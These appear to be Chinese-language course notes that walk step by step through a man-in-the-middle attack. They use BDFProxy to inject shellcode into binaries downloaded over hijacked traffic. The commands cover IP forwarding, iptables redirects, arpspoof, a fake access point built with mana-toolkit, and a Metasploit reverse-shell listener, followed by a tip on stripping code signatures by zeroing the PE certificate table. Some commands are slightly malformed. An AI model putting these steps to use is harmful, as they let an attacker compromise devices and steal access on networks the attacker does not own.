Bdfproxy(mitmproxy)
基于流量劫持动态注入shellcode(ARP spoof,DNS spoof,Fake AP)
步骤
启动路由功能
sysctl -w net.ipv4.ip_forward=1
cat /proc/sys/net/ipv4/ip_forward
把对80 443的访问请求重定向到8080
iptables -t nat -A PREROUTING -p tcp --dport 80/443 -j REDIRECT --to-
ports 8080
修改配置文件
vi /etc/bdfproxy/bdfproxy.cfg
修改工作方式,改成透明代理,默认是regular
proxyMode = transparent
设置好反弹的时候链接谁,有很多情况,因为事先是什么程序不知道
启动欺骗
arpspoof -i eth0 -t 欺骗谁 把我骗成谁
启动msf
用msfconsole调用bdfproxy生成的配置文件,来启动侦听
/usr/share/bdfproxy/xxxx.rc
手机欺骗
一加手机适合kali
Mana 创建 Fack AP
修改无线SSID名称
vi /etc/mana-toolkit/hostapd-mana.conf
修改启动脚本
./usr/share/mana-toolkit/run-mana/start-nat-simple.sh
修改无线网卡适配并启动
流量重定向,两条规则
iptables -t nat -A PREROUTING -i $phy -p tcp --dport 80/443 -j REDIRECT --
to-port 8080
Bdfproxy 代理注入代码
msf侦听反弹shell
Msfconsole -r /usr/share/bdfproxy/bdfproxy_msf_resource.rc
补充内容
全站HttPS放注入(微软每个补丁都可能带马),现在已经是https了
数字签名可以被清除,并不是完全之策
全部用0覆盖
PE Header -> Optional Header -> Certificate Table(Address and size)